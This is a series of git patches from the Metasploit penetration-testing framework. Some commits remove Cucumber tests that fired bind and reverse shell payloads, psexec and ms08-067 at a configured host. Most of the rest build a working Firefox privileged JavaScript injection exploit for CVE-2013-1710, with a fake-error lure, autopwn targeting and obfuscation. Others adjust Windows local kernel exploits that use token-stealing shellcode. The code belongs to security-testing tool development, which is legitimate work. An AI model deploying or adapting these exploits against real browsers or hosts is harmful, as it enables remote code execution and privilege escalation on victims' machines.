-        spec = configurations[Metasploit::Framework.env]
-
-        # Need to connect or ActiveRecord::Base.connection_pool will raise an
-        # error.
-        framework.db.connect(spec)
-      end
-
-      it 'should call ActiveRecord::Base.connection_pool.with_connection' do
-        # 1st is from with_established_connection
-        # 2nd is from module_info_by_path_from_database!
-        ActiveRecord::Base.connection_pool.should_receive(:with_connection).at_least(2).times
-
-        module_info_by_path_from_database!
-      end
-
       it 'should use ActiveRecord::Batches#find_each to enumerate Mdm::Module::Details in batches' do
         Mdm::Module::Detail.should_receive(:find_each)
 
@@ -408,7 +389,7 @@ shared_examples_for 'Msf::ModuleManager::Cache' do
         end
 
         it 'should use Msf::Modules::Loader::Base.typed_path to derive parent_path' do
-          Msf::Modules::Loader::Base.should_receive(:typed_path).with(type, reference_name).and_call_original
+          Msf::Modules::Loader::Base.should_receive(:typed_path).with(type, reference_name).at_least(:once).and_call_original
 
           module_info_by_path_from_database!
         end
@@ -465,8 +446,6 @@ shared_examples_for 'Msf::ModuleManager::Cache' do
         false
       end
 
-      it { should_not query_the_database.when_calling(:module_info_by_path_from_database!) }
-
       it 'should reset #module_info_by_path' do
         # pre-fill module_info_by_path so change can be detected
         module_manager.send(:module_info_by_path=, double('In-memory Cache'))
diff --git a/spec/support/shared/examples/msf/simple/framework/module_paths.rb b/spec/support/shared/examples/msf/simple/framework/module_paths.rb
index 56df640695..a202dfc99e 100644
--- a/spec/support/shared/examples/msf/simple/framework/module_paths.rb
+++ b/spec/support/shared/examples/msf/simple/framework/module_paths.rb
@@ -3,11 +3,11 @@ shared_examples_for 'Msf::Simple::Framework::ModulePaths' do
 
   context '#init_module_paths' do
     def init_module_paths
-      framework.init_module_paths
+      framework.init_module_paths(options)
     end
 
     let(:module_directory) do
-      nil
+      Rails.application.root.join('modules').expand_path.to_path
     end
 
     let(:user_module_directory) do
@@ -23,7 +23,6 @@ shared_examples_for 'Msf::Simple::Framework::ModulePaths' do
       # to init_module_paths doesn't get captured.
       framework
 
-      Msf::Config.stub(:module_directory => module_directory)
       Msf::Config.stub(:user_module_directory => user_module_directory)
     end
 
@@ -33,22 +32,15 @@ shared_examples_for 'Msf::Simple::Framework::ModulePaths' do
       init_module_paths
     end
 
+    it "adds Rails.application.paths['modules'] to module paths" do
+      expect(framework.modules).to receive(:add_module_path).with(module_directory, options)
+
+      init_module_paths
+    end
+
     context 'Msf::Config' do
-      context 'module_directory' do
-        context 'without nil' do
-          let(:module_directory) do
-            'modules'
-          end
-
-          it 'should add Msf::Config.module_directory to module paths' do
-            framework.modules.should_receive(:add_module_path).with(
-                module_directory,
-                options
-            )
-
-            init_module_paths
-          end
-        end
+      before(:each) do
+        allow(Rails.application.paths).to receive(:[]).with('modules').and_return(nil)
       end
 
       context 'user_module_directory' do
@@ -70,6 +62,10 @@ shared_examples_for 'Msf::Simple::Framework::ModulePaths' do
     end
 
     context 'datastore' do
+      before(:each) do
+        allow(Rails.application.paths).to receive(:[]).with('modules').and_return(nil)
+      end
+
       context 'MsfModulePaths' do
         let(:module_paths) do
           module_paths = []
diff --git a/test/features/data/test.exe b/test/features/data/test.exe
deleted file mode 100644
index 792d600548..0000000000
--- a/test/features/data/test.exe
+++ /dev/null
@@ -1 +0,0 @@
-#
diff --git a/test/features/encoders.feature b/test/features/encoders.feature
deleted file mode 100644
index 2eff0c65a5..0000000000
--- a/test/features/encoders.feature
+++ /dev/null
@@ -1,18 +0,0 @@
-#This feature contains scenarios that test the various encoders within the metasploit framework
-
-@announce-stdout
-
-Feature: As a Metasploit Framework user
-	I want to user encoders
-	So that I can encode various payloads I might use for attacks
-
-Scenario: Create a windows tcp bind payload using the x86/unicode mixed encoder
-		When I run msfvenom to encode for windows using the "x86/unicode_mixed" encoder with "-i 1" options and a buffer register
-        #When I run `./msfvenom -p windows/shell/bind_tcp -e x86/unicode_mixed -i 1 BufferRegister=eax` interactively
-        Then the output should contain "x86/unicode_mixed succeeded with size"
-
-Scenario: Create a windows tcp bind payload encoded with x86 alpha mixed
-	When I run msfvenom to encode for windows using the "x86/alpha_mixed" encoder with "-b '\x00' -i 1" options
-	#When I run `./msfvenom -p windows/shell/bind_tcp -e x86/alpha_mixed -b '\x00' -i 1` interactively
-	Then the output should contain "x86/alpha_mixed succeeded with size"
-
diff --git a/test/features/handler.feature b/test/features/handler.feature
deleted file mode 100644
index 3c3a64c539..0000000000
--- a/test/features/handler.feature
+++ /dev/null
@@ -1,19 +0,0 @@
-#This feature contains scenarios that test different handlers within the metasploit framework
-@announce
-
-Feature: As a MS Framework User
-	I want to launch various handlers
-	So the framework can properly handle input and output from exploits 
-
-Scenario: Launching the exploit multi handler in Check mode
-	When I run `./msfcli exploit/multi/handler C`
-	Then the output should contain "module tree"
-	Then the output should contain "This exploit does not support check."
-
-Scenario: Launching the generic multi handler in Check mode
-	When I run `./msfcli multi/handler C`
-        Then the output should contain "module tree"
-        Then the output should contain "This exploit does not support check."
-
- 
-
diff --git a/test/features/payloads.feature b/test/features/payloads.feature
deleted file mode 100644
index 8c50d4262b..0000000000
--- a/test/features/payloads.feature
+++ /dev/null
@@ -1,24 +0,0 @@
-#This feature contains scenarios to test the ability to run/access payloads from the metasploit framework
-
-Feature: I want access to Metasploit payloads
-	So that I can define payload options for exploits
-
-Scenario: Verify the windows shell reverse tcp payload option in ruby
-	When I run msfpayload to generate a "windows/shell_reverse_tcp" on the local host
-	Then the output should contain "# windows/shell_reverse_tcp"
-	Then the output should contain "# http://www.metasploit.com"
-
-Scenario: Verify the windows x64 shell reverse tcp payload option in ruby
-		When I run msfpayload to generate a "windows/x64/shell_reverse_tcp" on the local host
-        Then the output should contain "# windows/x64/shell_reverse_tcp"
-        Then the output should contain "# http://www.metasploit.com"
-
-Scenario: Verify the linux x86 shell reverse tcp payload option in ruby
-		When I run msfpayload to generate a "linux/x86/shell_reverse_tcp" on the local host
-        Then the output should contain "# linux/x86/shell_reverse_tcp"
-        Then the output should contain "# http://www.metasploit.com"
-
-Scenario: Verify the windows meterpreter reverse tcp payload can output its contents in ruby
-	When I run msfpayload to generate a "windows/meterpreter/reverse_tcp" on the local host
-	Then the output should contain "# windows/meterpreter/reverse_tcp - 290 bytes (stage 1)"
-	Then the output should contain "# http://www.metasploit.com"
diff --git a/test/features/steps/common_steps.rb b/test/features/steps/common_steps.rb
deleted file mode 100644
index 21620e30d6..0000000000
--- a/test/features/steps/common_steps.rb
+++ /dev/null
@@ -1,31 +0,0 @@
-#This is the step definition file for common framework testing steps or meta steps
-
-When /^I run the "([^"]*)" exploit with standard target options$/ do |exploit|
-  steps %Q{
-    When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} E` interactively
-  }
-  end
-
-When /^I run the "([^"]*)" exploit with standard target options in check mode$/ do |exploit|
-  steps %Q{
-    When I run `#{exploit} RHOST=#{TestConfig.instance.rhost} SMBPass=#{TestConfig.instance.smbpass} SMBUser=#{TestConfig.instance.smbuser} C` interactively
-  }
-  end
-
-When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options$/ do |encoder, options|
-  steps %Q{
-    When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options}` interactively
-  }
-  end
-
-When /^I run msfvenom to encode for windows using the "([^"]*)" encoder with "(.*)" options and a buffer register$/ do |encoder, options|
-  steps %Q{
-    When I run `./msfvenom ./msfvenom -p windows/shell/bind_tcp -e #{encoder} #{options} BufferRegister=eax` interactively
-  }
-  end
-
-When /^I run msfpayload to generate a "([^"]*)" on the local host$/ do |payload|
-  steps %Q{
-      When I run `./msfpayload #{payload} LHOST=127.0.0.1 y`
-  }
-  end
\ No newline at end of file
diff --git a/test/features/steps/handler_steps.rb b/test/features/steps/handler_steps.rb
deleted file mode 100644
index 9660708856..0000000000
--- a/test/features/steps/handler_steps.rb
+++ /dev/null
@@ -1,23 +0,0 @@
-#This is the step definition file for cucumber features relating to the framework handler feature
-
-  Given /^I launch the exploit multi handler$/ do
-  steps %Q{
-  
-    When I run `./msfcli exploit/multi/handler E`
-    Then the output should contain "Please wait while we load the module tree..."
-    Then the output should contain "Started reverse handler on"
-    Then the output should contain "Starting the payload handler..."
-
-  }
-  end
-
-Given /^I launch the generic multi handler$/ do
-        steps %Q{
-
-                When I run `./msfcli multi/handler E`
-                Then the output should contain "Please wait while we load the module tree..."
-                Then the output should contain "Started reverse handler on"
-                Then the output should contain "Starting the payload handler..."
-
-        }
-  end
diff --git a/test/features/support/.gitignore b/test/features/support/.gitignore
deleted file mode 100644
index 10eca368d9..0000000000
--- a/test/features/support/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-# These files are to be excluded from git #
-
-test_config.yml
diff --git a/test/features/support/env.rb b/test/features/support/env.rb
deleted file mode 100644
index 9a60d7d973..0000000000
--- a/test/features/support/env.rb
+++ /dev/null
@@ -1,25 +0,0 @@
-#Cucumber automation environment setup class for MSF Testing
-
-require 'cucumber'
-require 'aruba/cucumber'
-require_relative 'test_config'
-
-Before do
-  # Automatically find the framework path
-  default_path = File.join(File.expand_path(File.dirname(__FILE__)), '../../../')
-
-  # Add more paths manually if needed. For example:
-  # "/Users/gary/rapid7/framework"
-  @dirs = [default_path]
-
-  @aruba_timeout_seconds = 150
-end
-
-Before('@slow_process') do 
-  @aruba_io_wait_seconds = 150
-end
-
-@After
-#after automation execution methods go here
-
-
diff --git a/test/features/support/test_config.rb b/test/features/support/test_config.rb
deleted file mode 100644
index 8c1c5b9b77..0000000000
--- a/test/features/support/test_config.rb
+++ /dev/null
@@ -1,44 +0,0 @@
-#Test config class provides public methods or varables to use for ever test
-#Includes housing data such as default web site to test, time out varaibels, etc
-require 'singleton'
-class TestConfig
-  include Singleton
-  
-  def initialize(*args)
-
-  yml_path = File.join(File.dirname(__FILE__),'test_config.yml')
-  
-  if File.exists?(yml_path)
-    @yaml_options = YAML::load(File.open(yml_path))
-  else
-    @yaml_options = {}
-  end
-    
-    @options = {
-    	"rhost" => "localhost",
-  "smbuser" => "user",
-  "smbpass" => "password" 
-   } 
-  end
-  
-  def run_server
-    @options[:define_site].nil?
-  end
-
-  def method_missing(method)
-    if @options.has_key? method.to_s
-      return @options[method.to_s]
-    else
-      super
-    end
-  end
-
-def respond_to?(method_sym, include_private = false)
-    if @options.include? method_s
-      true
-    else
-      super
-    end
-  end
-
-end
diff --git a/test/features/windows_exploits.feature b/test/features/windows_exploits.feature
deleted file mode 100644
index 5739874cd9..0000000000
--- a/test/features/windows_exploits.feature
+++ /dev/null
@@ -1,31 +0,0 @@
-#This feature contains scenarios that test running exploits related to microsft windows platforms
-
-@announce-stdout
-
-Feature: I want to launch Windows based exploits
-	So that I can hack Windows targets
-	So that I can prove how totally unsecured Windows can be
-
-Scenario: Launch Psexec against a Windows Host
-	When I run the "./msfcli windows/smb/psexec" exploit with standard target options
-	Then the output should contain "445|WORKGROUP as user"
-	Then the output should contain "module tree"
-
-Scenario: Launch PSexec in Internal Check Mode
-	When I run the "./msfcli windows/smb/psexec" exploit with standard target options in check mode
-        Then the output should contain "module tree"
-	Then the output should contain "This exploit does not support check."
-
-Scenario: Launch ms08-067 in Internal Check Mode
-	When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options in check mode
-	#When I run `./msfcli windows/smb/ms08_067_netapi RHOST=10.6.0.194 C` interactively
-	Then the output should contain "module tree"
-	Then the output should not contain "Check failed:"
-
-Scenario: Launch ms08-067 against a windows remote host
-	When I run the "./msfcli windows/smb/ms08_067_netapi" exploit with standard target options
-	Then the output should contain "module tree"
-	Then the output should contain "Started reverse handler"
-
-
-

From 82760bf5b358bb4e9d00ddfe76c97583d121ddc4 Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Fri, 15 Aug 2014 12:33:44 -0500
Subject: [PATCH 307/321] Deprecation warnings hidden for non-listeners

---
 lib/metasploit/framework/common_engine.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/metasploit/framework/common_engine.rb b/lib/metasploit/framework/common_engine.rb
index 3a0903e4f5..fe2ecc3e95 100644
--- a/lib/metasploit/framework/common_engine.rb
+++ b/lib/metasploit/framework/common_engine.rb
@@ -27,6 +27,8 @@ module Metasploit::Framework::CommonEngine
     config.paths.add 'data/meterpreter', glob: '**/ext_*'
     config.paths.add 'modules'
 
+    config.active_support.deprecation = :notify
+
     #
     # `initializer`s
     #

From edb9d32e5cdab79fbac706ebd59f0b1a802d444c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 15:08:10 -0500
Subject: [PATCH 308/321] Add module for toString() injection in firefox.

---
 .../browser/firefox_tostring_injection.rb     | 97 +++++++++++++++++++
 1 file changed, 97 insertions(+)
 create mode 100644 modules/exploits/multi/browser/firefox_tostring_injection.rb

diff --git a/modules/exploits/multi/browser/firefox_tostring_injection.rb b/modules/exploits/multi/browser/firefox_tostring_injection.rb
new file mode 100644
index 0000000000..bfb411bea7
--- /dev/null
+++ b/modules/exploits/multi/browser/firefox_tostring_injection.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Firefox toString User-Assisted Privileged Javascript Injection',
+      'Description'    => %q{
+        This exploit gains remote code execution on Firefox 21-23 by abusing two separate
+        Javascript-related vulnerabilities to ultimately inject malicious Javascript code
+        into a context running with chrome:// privileges.
+
+        For the exploit to work, the user must have the Web Console open. There is no way to
+        trigger this from unprivileged Javascript, so for now a message is displayed telling
+        the user that there is an error and to press cmd-option-k to open the Web Console,
+        upon which the exploit will immediately run.
+      },
+      'License' => MSF_LICENSE,
+      'Author'  => [
+        'moz_bug_r_a4', # discovered CVE-2013-1710
+        'joev' # metasploit module
+      ],
+      'DisclosureDate' => "Aug 6 2013",
+      'References' => [
+        ['CVE', 'CVE-2013-1710']   # bypass Chrome Object Wrapper to talk to chrome://
+      ],
+      'Targets' => [
+        [
+          'Universal (Javascript XPCOM Shell)', {
+            'Platform' => 'firefox',
+            'Arch' => ARCH_FIREFOX
+          }
+        ],
+        [
+          'Native Payload', {
+            'Platform' => %w{ java linux osx solaris win },
+            'Arch'     => ARCH_ALL
+          }
+        ]
+      ],
+      'DefaultTarget' => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_name => HttpClients::FF,
+        :ua_ver  => lambda { |ver| ver.to_i.between?(21, 23) }
+      }
+    ))
+
+    register_options([
+      OptString.new('CONTENT', [
+        true,
+        "Content to display inside the HTML <body>.",
+        "An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i)) ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
+      ])
+    ], self.class)
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    send_response_html(cli, generate_html(target_info))
+  end
+
+  def generate_html(target_info)
+    opts = {
+      :payload => run_payload # defined in FirefoxPrivilegeEscalation mixin
+    }
+
+    %Q|
+       <!doctype html>
+       <html>
+         <body>
+           <script>
+             var opts = #{JSON.unparse(opts)};
+             var y = {};
+             y.constructor.prototype.toString=function() {
+               if (window.q) return;
+               window.q = true;
+               crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
+               return 5;
+             };
+             console.dir(y);
+           </script>
+           #{datastore['CONTENT']}
+         </body>
+       </html>
+    |
+  end
+end
+

From f182613034dd511bc7b44c7bd5dde8b82c9d757f Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 15:09:45 -0500
Subject: [PATCH 309/321] Invalid CVE format.

---
 modules/exploits/multi/browser/firefox_tostring_injection.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_injection.rb b/modules/exploits/multi/browser/firefox_tostring_injection.rb
index bfb411bea7..dbf55c0f81 100644
--- a/modules/exploits/multi/browser/firefox_tostring_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_injection.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
       ],
       'DisclosureDate' => "Aug 6 2013",
       'References' => [
-        ['CVE', 'CVE-2013-1710']   # bypass Chrome Object Wrapper to talk to chrome://
+        ['CVE', '2013-1710']   # bypass Chrome Object Wrapper to talk to chrome://
       ],
       'Targets' => [
         [
@@ -59,7 +59,8 @@ class Metasploit3 < Msf::Exploit::Remote
       OptString.new('CONTENT', [
         true,
         "Content to display inside the HTML <body>.",
-        "An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i)) ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
+        "An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i))"+
+        " ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
       ])
     ], self.class)
   end

From 0cc3bdfb351a1790584c63dde8fa2ea50016c286 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Fri, 15 Aug 2014 21:11:37 +0100
Subject: [PATCH 310/321] Moar bad packs

---
 modules/exploits/windows/local/mqac_write.rb         | 4 ++--
 modules/exploits/windows/local/ms_ndproxy.rb         | 6 +++---
 modules/exploits/windows/local/novell_client_nwfs.rb | 8 ++++----
 3 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb
index e8c3ae4b7f..68f01e41f2 100644
--- a/modules/exploits/windows/local/mqac_write.rb
+++ b/modules/exploits/windows/local/mqac_write.rb
@@ -123,8 +123,8 @@ class Metasploit3 < Msf::Exploit::Local
 
     this_proc = session.sys.process.open
     unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
-                                                    [0xffff].pack('L'),
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('V'), nil,
+                                                    [0xffff].pack('V'),
                                                     'MEM_COMMIT|MEM_RESERVE',
                                                     'PAGE_EXECUTE_READWRITE')
     end
diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb
index f2206e79ed..69d3f6b993 100644
--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -90,15 +90,15 @@ class Metasploit3 < Msf::Exploit::Local
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('L')  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('L') # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     ring0_shellcode
   end
 
   def fill_memory(proc, address, length, content)
-    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('L'), nil, [length].pack('L'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
+    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [address].pack('V'), nil, [length].pack('V'), 'MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN', 'PAGE_EXECUTE_READWRITE')
     unless proc.memory.writable?(address)
       vprint_error('Failed to allocate memory')
       return nil
diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb
index 90567648de..68c29882c8 100644
--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def find_sys_base(drvname)
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
@@ -98,8 +98,8 @@ class Metasploit3 < Msf::Exploit::Local
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
-    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
-    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
     tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
     tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Local
 
   def fill_memory(proc, address, length, content)
 
-    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")

From 738a295f0aaefcf2cbb2b784ea5742737ceec4ee Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 15:17:37 -0500
Subject: [PATCH 311/321] Rename module to tostring_console*.

---
 ...ostring_injection.rb => firefox_tostring_console_injection.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/exploits/multi/browser/{firefox_tostring_injection.rb => firefox_tostring_console_injection.rb} (100%)

diff --git a/modules/exploits/multi/browser/firefox_tostring_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
similarity index 100%
rename from modules/exploits/multi/browser/firefox_tostring_injection.rb
rename to modules/exploits/multi/browser/firefox_tostring_console_injection.rb

From 694d917acc1074d6a0d71d72a8eb040fdd160b3d Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 16:02:26 -0500
Subject: [PATCH 312/321] No need for web console YESSSS

---
 .../multi/browser/firefox_tostring_console_injection.rb  | 9 ++-------
 1 file changed, 2 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index dbf55c0f81..db011c617a 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -56,12 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('CONTENT', [
-        true,
-        "Content to display inside the HTML <body>.",
-        "An error has occurred. Press <script>document.write((navigator.platform.match(/mac/i))"+
-        " ? 'cmd-option-k' : 'ctrl-alt-k')</script> to see the error."
-      ])
+      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
     ], self.class)
   end
 
@@ -87,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
                crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, opts.payload, 1024, null, "rsa-ex");
                return 5;
              };
-             console.dir(y);
+             console.time(y);
            </script>
            #{datastore['CONTENT']}
          </body>

From 8c63c8f43db06251d8a1fe510c6c7d8629860342 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 16:28:21 -0500
Subject: [PATCH 313/321] Add browserautopwn hook now that this is not
 user-assisted.

---
 .../firefox_tostring_console_injection.rb        | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index db011c617a..f452c0a905 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -9,20 +9,24 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::Remote::BrowserAutopwn
   include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
 
+  autopwn_info({
+    :ua_name    => HttpClients::FF,
+    :ua_minver  => "17.0",
+    :ua_maxver  => "17.0.1",
+    :javascript => true,
+    :rank       => NormalRanking
+  })
+
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Firefox toString User-Assisted Privileged Javascript Injection',
+      'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
       'Description'    => %q{
         This exploit gains remote code execution on Firefox 21-23 by abusing two separate
         Javascript-related vulnerabilities to ultimately inject malicious Javascript code
         into a context running with chrome:// privileges.
-
-        For the exploit to work, the user must have the Web Console open. There is no way to
-        trigger this from unprivileged Javascript, so for now a message is displayed telling
-        the user that there is an error and to press cmd-option-k to open the Web Console,
-        upon which the exploit will immediately run.
       },
       'License' => MSF_LICENSE,
       'Author'  => [

From 5706371c77f25a82cf6e270c50f2781db37e98c0 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 16:32:06 -0500
Subject: [PATCH 314/321] Update browser autopwn settings.

---
 .../multi/browser/firefox_tostring_console_injection.rb     | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index f452c0a905..6b149b1479 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -14,10 +14,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
   autopwn_info({
     :ua_name    => HttpClients::FF,
-    :ua_minver  => "17.0",
-    :ua_maxver  => "17.0.1",
+    :ua_minver  => "21.0",
+    :ua_maxver  => "23.0",
     :javascript => true,
-    :rank       => NormalRanking
+    :rank       => ExcellentRanking
   })
 
   def initialize(info = {})

From b574a4c4c50aa2cd6bc9ea8f6b8cc4c9d2fe3d61 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 16:39:36 -0500
Subject: [PATCH 315/321] Wow, this gets a shell all the way back to 15.0.

---
 .../multi/browser/firefox_tostring_console_injection.rb     | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index 6b149b1479..14f513dfe5 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   autopwn_info({
     :ua_name    => HttpClients::FF,
-    :ua_minver  => "21.0",
+    :ua_minver  => "15.0",
     :ua_maxver  => "23.0",
     :javascript => true,
     :rank       => ExcellentRanking
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => 'Firefox toString console.time Privileged Javascript Injection',
       'Description'    => %q{
-        This exploit gains remote code execution on Firefox 21-23 by abusing two separate
+        This exploit gains remote code execution on Firefox 15-23 by abusing two separate
         Javascript-related vulnerabilities to ultimately inject malicious Javascript code
         into a context running with chrome:// privileges.
       },
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'BrowserRequirements' => {
         :source  => 'script',
         :ua_name => HttpClients::FF,
-        :ua_ver  => lambda { |ver| ver.to_i.between?(21, 23) }
+        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 23) }
       }
     ))
 

From fb1fe7cb8b7d0212fa658df12bf0a49e2501b52b Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Fri, 15 Aug 2014 16:54:30 -0500
Subject: [PATCH 316/321] Add some obfuscation.

---
 .../firefox_tostring_console_injection.rb     | 47 +++++++++++--------
 1 file changed, 27 insertions(+), 20 deletions(-)

diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
index 14f513dfe5..98fef07156 100644
--- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
+++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'rex/exploitation/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -69,28 +70,34 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def generate_html(target_info)
-    opts = {
